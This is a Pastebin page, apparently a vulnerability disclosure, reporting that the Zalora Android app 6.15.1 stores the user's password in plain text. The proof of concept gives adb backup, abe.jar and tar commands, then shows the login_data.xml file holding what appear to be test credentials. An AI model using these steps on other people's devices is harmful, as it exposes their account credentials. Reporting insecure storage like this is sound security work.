G2A Many GEOs
SHARE
TWEET

Zalora

a guest Apr 21st, 2019 505 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #Application: Zalora
  2. #Platform: Android
  3. #Version: 6.15.1 (latest)
  4. #Severity: Medium
  5. #Impact: None-root user can read the password in clear-text and login to the application.
  6.  
  7. POC:
  8.  
  9. 1. Backups application data into Local PC
  10. adb backup -f ~/zalora.ab -noapk com.zalora.android
  11.  
  12. 2. Converts file "zalora.ab" into tar file(file contains backup data of com.zalora.android)
  13. java -jar abe.jar unpack ~/zalora.ab zalora.tar ""
  14.  
  15. 3. Extracts tar file.
  16. tar -xvf zalora.tar
  17.  
  18. 4. After the extraction, goes and checks the data in the directory located in apps/com.zalora.android/
  19.  
  20. 5. Looks for sensitive data. The password stored in /shared_prefs/login_data.xml in plain-text
  21.  
  22. <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
  23. <map>
  24.     <string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;testme@gmail.com&quot;}</string>
  25. </map>
RAW Paste Data
Ledger Nano X - The secure hardware wallet
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top